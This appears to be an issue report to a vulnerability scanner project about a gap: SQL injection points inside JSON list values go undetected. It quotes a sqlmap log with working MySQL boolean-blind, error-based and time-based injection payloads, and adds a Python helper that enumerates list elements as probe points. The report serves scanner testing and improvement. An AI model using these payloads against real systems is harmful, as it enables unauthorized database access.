The sqlmap log is as follows:
sqlmap identified the following injection point(s) with a total of 426 HTTP(s) requests:
Parameter: JSON #1* ((custom) POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: {"userIds":["n1ddae22de4f74f8993e83c6' RLIKE (SELECT (CASE WHEN (5473=5473) THEN 0x6e3164646165323264653466373466383939336538336336 ELSE 0x28 END)) AND 'IlcB'='IlcB"],"uGroupIds":[],"privilegeName":"READER","resourceId":"p7a63bcf493fb49c4959633c","resourceType":"data-source"}
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: {"userIds":["n1ddae22de4f74f8993e83c6' AND EXTRACTVALUE(9553,CONCAT(0x5c,0x7178707a71,(SELECT (ELT(9553=9553,1))),0x7178706271)) AND 'ubrK'='ubrK"],"uGroupIds":[],"privilegeName":"READER","resourceId":"p7a63bcf493fb49c4959633c","resourceType":"data-source"}
Type: time-based blind
Title: MySQL >= 5.0.12 RLIKE time-based blind
Payload: {"userIds":["n1ddae22de4f74f8993e83c6' RLIKE SLEEP(5) AND 'NkVF'='NkVF"],"uGroupIds":[],"privilegeName":"READER","resourceId":"p7a63bcf493fb49c4959633c","resourceType":"data-source"}
I found that no probe points are injected into list values, so this SQL injection was not detected.
Burp Suite and sqlmap are able to detect this issue.
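The coverage gap reported above, as an added example that is not part of the original issue or the project's code: a scanner-side walk of the JSON body that treats every string inside a list as its own probe point, using the request body from the log with its original `userIds` value. The function names and the `*` placeholder marker are assumptions made for illustration.

```python
import copy
import json

# Constructed sample: the request body from the sqlmap log above, with the
# original userIds value restored. All function names below are hypothetical
# and are not taken from the project discussed in this issue.
SAMPLE_BODY = json.dumps({
    "userIds": ["n1ddae22de4f74f8993e83c6"],
    "uGroupIds": [],
    "privilegeName": "READER",
    "resourceId": "p7a63bcf493fb49c4959633c",
    "resourceType": "data-source",
})


def iter_leaf_paths(node, path=()):
    """Yield (path, value) for every scalar, descending into dicts AND lists."""
    if isinstance(node, dict):
        for key, child in node.items():
            yield from iter_leaf_paths(child, path + (key,))
    elif isinstance(node, list):
        for index, child in enumerate(node):
            yield from iter_leaf_paths(child, path + (index,))
    else:
        yield path, node


def with_marker(doc, path, marker):
    """Return a deep copy of doc with the string leaf at path suffixed by marker."""
    mutated = copy.deepcopy(doc)
    parent = mutated
    for step in path[:-1]:
        parent = parent[step]
    parent[path[-1]] = f"{parent[path[-1]]}{marker}"
    return mutated


def probe_bodies(body, marker="*"):
    """Map each string leaf path to a body that marks only that leaf."""
    doc = json.loads(body)
    return {
        path: json.dumps(with_marker(doc, path, marker))
        for path, value in iter_leaf_paths(doc)
        if isinstance(value, str)
    }


if __name__ == "__main__":
    print(*probe_bodies(SAMPLE_BODY).items(), sep="\n")
```

The path `("userIds", 0)` appears among the results, which is the list element that the log shows sqlmap testing; the empty `uGroupIds` list contributes no probe point.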